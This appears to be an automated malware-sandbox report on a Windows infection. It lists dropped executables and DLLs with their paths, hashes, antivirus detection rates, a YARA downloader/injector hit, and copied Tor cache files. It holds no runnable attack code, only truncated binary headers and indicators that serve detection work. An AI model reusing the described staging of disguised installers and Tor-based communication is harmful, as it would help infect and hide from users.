                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):257872
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                                                                                                                                MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                                                                                                                                SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                                                                                                                                SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                                                                                                                                SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dll

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):80880
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                                                                                                                                MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                                                                                                                                SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                                                                                                                                SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                                                                                                                                SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\ping[1].htm

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:3:V:V
                                                                                                                                                                                                                                                                                                                                                                MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                                                                                                                                                                                                                                                                                                                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                                                                                                                                                                                                                                                                                                                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                                                                                                                                                                                                                                                                                                                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:0

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\syncUpd[1].exe

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):327680
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.488997949477586
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:6144:i88LuFIhUJfTi0aFS8t4pcABVjtRYkM+:18SFIhUJLWDap/B1
                                                                                                                                                                                                                                                                                                                                                                MD5:7C0B88535C506FC8BEC1510F08F3329C
                                                                                                                                                                                                                                                                                                                                                                SHA1:026965F027F53725E0E93D069A7143D12BADD35C
                                                                                                                                                                                                                                                                                                                                                                SHA-256:7F2B4169D20BB191467B02ABCAE4DBC05E80BB5A20AECE8E3D04AAC7F05B0382
                                                                                                                                                                                                                                                                                                                                                                SHA-512:3E5D80F017B99E556A2CE8AC1849AC52E5E1EC38812D015E1DD8E4C276C45E3B5462CA0961D3C806113266B130B350FC993F6734A07A093A5A50BCCC7C5F160B
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 34%
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L....W.d.....................H.......$............@..........................p$.................................................d....P..x...............................................................@............................................text............................... ..`.rdata...\.......^..................@..@.data...d%... ...R..................@....rsrc...x. ..P.......Z..............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):64
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):1.1940658735648508
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:3:NlllulDm0ll//Z:NllU6cl/
                                                                                                                                                                                                                                                                                                                                                                MD5:DA1F22117B9766A1F0220503765A5BA5
                                                                                                                                                                                                                                                                                                                                                                SHA1:D35597157EFE03AA1A88C1834DF8040B3DD3F3CB
                                                                                                                                                                                                                                                                                                                                                                SHA-256:BD022BFCBE39B4DA088DDE302258AE375AAFD6BDA4C7B39A97D80C8F92981C69
                                                                                                                                                                                                                                                                                                                                                                SHA-512:520FA7879AB2A00C86D9982BB057E7D5E243F7FC15A12BA1C823901DC582D2444C76534E955413B0310B9EBD043400907FD412B88927DAD07A1278D3B667E3D9
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:@...e.................................R..............@..........

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\1199.dll

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):2052096
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.969636971541683
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:49152:M5pMGXLfbqxnVH0msXHgVNn5Vc0+bPNfjEzsHL:M5jLTqBVUNwHn5Vc0yCsr
                                                                                                                                                                                                                                                                                                                                                                MD5:B14E1A83FF7C4BF582485CC475FFB696
                                                                                                                                                                                                                                                                                                                                                                SHA1:102FF861CFEB7BD0953D5F6DB74F013DDB9AC667
                                                                                                                                                                                                                                                                                                                                                                SHA-256:2D2E0CB1D16BBE40200E1107E24F95A8753D7B6F9A17531C3336EAF63D3FA5D4
                                                                                                                                                                                                                                                                                                                                                                SHA-512:FBDEC548AABB2A7FFD7A6BFDE7F27C8436B7A89690061A0357945696D7DCC03D185A8921F4D827DD7240F06CC61BEADD7C9187D329B43201F4B7530C141DBAB3
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7..Y...Y...Y......Y......Y...X...Y...Y...Y......Y......Y......Y.Rich..Y.................PE..L...)z.A...........!................3........B...............................P......................................(...........<.... .......................0..\...@...................................................4............................text...k...........................gA.`.rdata..'...........................@..@.data............ ..................@...nqb.................................@....qdata..............................@...xcg.......... ....... ..............@...HIcf6ht.............................@....CRT.....B.......P..................@..@.rsrc........ ....... ..............@..@.reloc.......0... ...0..............@..B................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\1EB9.exe

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):7668707
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.999483604771398
                                                                                                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:196608:QBKGhoRYeQ9yHWKNKoLG/Lj31TpOYPHOYhx5ZNyq:C/hoRUcCT/lHzNyq
                                                                                                                                                                                                                                                                                                                                                                MD5:82BEB2A060E63C9C9A26663D0103FAE6
                                                                                                                                                                                                                                                                                                                                                                SHA1:5C6F8FFD78CECC031826600A3E32AB993DB8E97B
                                                                                                                                                                                                                                                                                                                                                                SHA-256:3CBDC920606D1DE26237500736A0A2E7B751513D3BCF815F68B468AE0CC92E8F
                                                                                                                                                                                                                                                                                                                                                                SHA-512:DB9E03E5BBCCC762A4C6A6B34BFC526B9CBA7EB7BB2CD0A2BC160C303BDBCCE756830FC81C4DD1F62187DAB6442AA3E29681F7E518AF0963BE66FC582458D6B7
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F......@.............@..........................@...................@..............................P........,..........................................................................................................CODE....d........................... ..`DATA....L...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\356F.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):4315536
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.986023355020629
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:98304:Ox34CiKzvjm7SLtMZTm7LASnwWEuCSeZHe31O6Y/qHYq9Pei:OB4yzvjmEtMf+wT3Us6Y/qHYKB
                                                                                                                                                                                                                                                                                                                                                                MD5:D122F827C4FC73F9A06D7F6F2D08CD95
                                                                                                                                                                                                                                                                                                                                                                SHA1:CD1D1DC2C79C0EE394B72EFC264CFD54D96E1EE5
                                                                                                                                                                                                                                                                                                                                                                SHA-256:B7A6DCFDD64173ECBCEF562FD74AEE07F3639FA863BD5740C7E72DDC0592B4FC
                                                                                                                                                                                                                                                                                                                                                                SHA-512:8755979D7383D6CB5E7D63798C9CA8B9C0FAEEC1FE81907FC75BBBB7BE6754AB7B5A09A98492A27F90E3F26951B6891C43D8ACD21414FB603CD86A4E10DAC986
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 51%
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...&f.d.................`@..p...............p@...@...................................B......................................@.<.....A...............A..............q@...............................@.@............p@.`............................text....^@......`@................. ..`.rdata...W...p@..X...d@.............@..@.data.........@..P....@.............@....rsrc.....O...A.......A.............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\356F.exe

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):9104384
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.9258891229768595
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:196608:drdPa3Pl8j7Ke1k6N25U0agbrT6NZ+t0ZGhsYN6mQwclTm2:d5P08KeDQtSb+t0ZEJQwcTm
                                                                                                                                                                                                                                                                                                                                                                MD5:CEAE65EE17FF158877706EDFE2171501
                                                                                                                                                                                                                                                                                                                                                                SHA1:B1F807080DA9C25393C85F5D57105090F5629500
                                                                                                                                                                                                                                                                                                                                                                SHA-256:0DAC8A3FE3C63611B49DB21B2756B781CC4C9117C64007E0C23E6D3E7CA9EE49
                                                                                                                                                                                                                                                                                                                                                                SHA-512:5214FEBFAB691B53CA132E75E217E82A77E438250695D521DBF6BC1770D828F2E79A0070FD746A73E29ACC11BF9A62CEAFB1CF85547C7C0178D49A740FF9AE7B
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                                                                                                                                                • Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\356F.exe, Author: ditekSHen
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e................................ ... ....@.. .......................`............@.................................`...K.... ..@....................@....................................................... ............... ..H............text........ ..................... ..`.rsrc...@.... .....................@..@.reloc.......@.....................@..B........................H.......................'..............................................0.._.......~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.~.... ....Z(....~....,.r...pr...p.(....&..8....~.....o.....~.....o.....~.....o.....~.....o.......(......~....,...(......~....r...p(....,.(....r...po......(......+)~....r1..p(....,...(....r...po....(..........(....(..........(.......(......X..~....o....?....~....&*..0../........s.....s.......s.......o.......,

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\4KPV6A~1\cached-certs (copy)

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):16296
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.052124604275745
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:384:cMY4QkV6icO1hMtqyd4AW9V9hC1hIhyd24ZFtVf1hc1x2h4YVc1h1FU4WGYgVVd/:6BkoicOaqyrqvUg62M1ux6xyh6ddgV//
                                                                                                                                                                                                                                                                                                                                                                MD5:8F1603CA7F80FAD01AD3C7DCC90CD89B
                                                                                                                                                                                                                                                                                                                                                                SHA1:5F5E36B6999015230E4389FD0E114E29A86B48E8
                                                                                                                                                                                                                                                                                                                                                                SHA-256:9E9E43A8B7FC3C252E908C287C790A0A7147A7BB3E8F4C939B9DEEDEF0EEE373
                                                                                                                                                                                                                                                                                                                                                                SHA-512:23911CE38561D556151523ADC4E1C48BD13B8E6B5253C92221FCDD9D3C73F252819113067BB0D60C2DB205BDD221AB59716BFE821D0BB4B416B0B78517C0686D
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:dir-key-certificate-version 3..fingerprint 0232AF901C31A04EE9848595AF9BB7620D4C5B2E..dir-key-published 2023-05-17 14:30:40..dir-key-expires 2024-05-17 14:30:40..dir-identity-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEAu9O0Pueesn0+29BlxZs60mBqehjdQtgSnKOm9QZxbQ0xrMQgbFnR..hWbKD8erenyeFk2SF6AJkbyzgYC89hyPW+8GBDmg5bE8fRKjgV/nI3tY2m4rkY3u..zSmYIdwqHUUc98Xzt9PaQ8IJAlDBY4XLKrWmJMxSyhBlVEept7+9Tj23qowW44Mz..xPJZ1aFkB1FpkD6qmoCzVZbhXy3cGt1nDwdJK7KqlaXziz9pFiw8PzTVU2xFgJNy..+nEcT72DBtk3G5K2Riu/aXY/D541Cioj9KMV4Nv4g8aBKx58Xq2tq1pFkc1Bqj1y..2MomVR3iskFzlqC8yKWGVe4OP2IaOhtcQJYp5GR9q+dWnr53WWNVxNu3sA9iMal3..PJUk5pIYrsmArGew5gmlCe+Al46nPINxc7ouztmStAV+2F6SpZlKOcstnT+KJ52O..1xnOSaj/WnzG2o4KZ9UrFQoUNOLQJcelPcC+vrinMk9BQPcB072l9NjpUBC9brsW..qTCMStn1jfDDAgMBAAE=..-----END RSA PUBLIC KEY-----..dir-signing-key..-----BEGIN RSA PUBLIC KEY-----..MIIBCgKCAQEAvIW/KEA4eoi2rkD6vDKcLu2+2DY5K3pd9P5edSvQ8mBY21CeUfhY..WI+XWr1K9U5/yNsJS8YCvGEtvNK+yEnHkBKLItvi6ibv6W8nP5l4sLhooJBaPm7v..FDhtbnp6HTMbSnBXTxT2gaSPJ+p9

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\4KPV6A~1\cached-microdesc-consensus (copy)

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1006)
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):2769329
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.611801493881774
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:iqGR6/th9CIb6sp4bVmEhkRWPRdc+xWUn/srnM7LpRfW+CXt:i1Ru8kpEDGWOUnSnudQ+Q
                                                                                                                                                                                                                                                                                                                                                                MD5:3A067DB61DDAAC7D61C3F7C8A4BAE018
                                                                                                                                                                                                                                                                                                                                                                SHA1:53CF40FD15FAA8FF5F4FFAD29DDBE792F3A5D3F2
                                                                                                                                                                                                                                                                                                                                                                SHA-256:1FCEACBE916735E8231FCFA12DE98044F1872D14DEA00B1CAE38C9871265E915
                                                                                                                                                                                                                                                                                                                                                                SHA-512:2881C1BA4BC6929F5074E691EF589F35875185CCEFD7670CCE3B850DD61B1E204EA998D1E3FB1AD47B2DF0D2058C89576D72876BB33E457C2C9687D426C4D503
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:network-status-version 3 microdesc.vote-status consensus.consensus-method 33.valid-after 2024-02-05 10:00:00.fresh-until 2024-02-05 11:00:00.valid-until 2024-02-05 13:00:00.voting-delay 300 300.client-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.server-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.params AuthDirMaxServersPerAddr=8 CircuitPriorit

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\4KPV6A~1\state (copy)

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (432), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):4081
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.288738668097656
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:48:cASzeUqhztJm/r57Qvid3lbXEwQ0qCc0fddXDT6QoHk2n:LzUqhzTm/r6w3lXy3Cdfdd5ck2n
                                                                                                                                                                                                                                                                                                                                                                MD5:F0428034CA3F03B3B460CDBC2D4C67A1
                                                                                                                                                                                                                                                                                                                                                                SHA1:ECE772106FCB63F2B29088C7680ED99B9F365886
                                                                                                                                                                                                                                                                                                                                                                SHA-256:750DC180F54FC8C6CBE4D4B814B589676EC9D14F84010221C2E357EE46683C21
                                                                                                                                                                                                                                                                                                                                                                SHA-512:4467BA3137E79727DE49523D4A6EC54B7EB2ADC06CADAB5BCD0474F7B07BE2206B390951864461216758C99FAEFDD456F7B8F650FE3293C017A95E45671D6CC3
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:# Tor state file last generated on 2024-02-05 12:19:18 local time..# Other times below are in UTC..# You *do not* need to edit this file.....CircuitBuildTimeBin 725 2..CircuitBuildTimeBin 775 2..CircuitBuildTimeBin 1225 2..CircuitBuildTimeBin 5825 2..CircuitBuildTimeBin 6275 2..CircuitBuildTimeBin 7575 1..CircuitBuildTimeBin 8225 1..CircuitBuildTimeBin 15975 1..Dormant 0..Guard in=default rsa_id=8C21ADDA21228BB4260C73FD5ED1687070EF53DE nickname=iusearchbtw sampled_on=2024-02-04T19:16:56 sampled_idx=0 sampled_by=0.4.4.9 listed=1..Guard in=default rsa_id=5C80CB557C96CAD80EF8EC6AB55865329DF74B1B nickname=Droutnutch sampled_on=2024-02-04T11:05:44 sampled_idx=1 sampled_by=0.4.4.9 listed=1 confirmed_on=2024-01-30T19:10:57 confirmed_idx=0 pb_use_attempts=6.000000 pb_use_successes=5.000000 pb_circ_attempts=10.000000 pb_circ_successes=8.000000 pb_successful_circuits_closed=6.000000 pb_collapsed_circuits=1.000000 pb_unusable_circuits=1.000000 pb_timeouts=3.000000..Guard in=default rsa_id=606ECD6

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\4KPV6A~1\unverified-microdesc-consensus (copy)

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1006)
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):2769329
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.611801493881774
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:iqGR6/th9CIb6sp4bVmEhkRWPRdc+xWUn/srnM7LpRfW+CXt:i1Ru8kpEDGWOUnSnudQ+Q
                                                                                                                                                                                                                                                                                                                                                                MD5:3A067DB61DDAAC7D61C3F7C8A4BAE018
                                                                                                                                                                                                                                                                                                                                                                SHA1:53CF40FD15FAA8FF5F4FFAD29DDBE792F3A5D3F2
                                                                                                                                                                                                                                                                                                                                                                SHA-256:1FCEACBE916735E8231FCFA12DE98044F1872D14DEA00B1CAE38C9871265E915
                                                                                                                                                                                                                                                                                                                                                                SHA-512:2881C1BA4BC6929F5074E691EF589F35875185CCEFD7670CCE3B850DD61B1E204EA998D1E3FB1AD47B2DF0D2058C89576D72876BB33E457C2C9687D426C4D503
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:network-status-version 3 microdesc.vote-status consensus.consensus-method 33.valid-after 2024-02-05 10:00:00.fresh-until 2024-02-05 11:00:00.valid-until 2024-02-05 13:00:00.voting-delay 300 300.client-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.server-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.params AuthDirMaxServersPerAddr=8 CircuitPriorit

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\4kPv6aJG8e\cached-certs.tmp

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):16296
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.052124604275745
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:384:cMY4QkV6icO1hMtqyd4AW9V9hC1hIhyd24ZFtVf1hc1x2h4YVc1h1FU4WGYgVVd/:6BkoicOaqyrqvUg62M1ux6xyh6ddgV//
                                                                                                                                                                                                                                                                                                                                                                MD5:8F1603CA7F80FAD01AD3C7DCC90CD89B
                                                                                                                                                                                                                                                                                                                                                                SHA1:5F5E36B6999015230E4389FD0E114E29A86B48E8
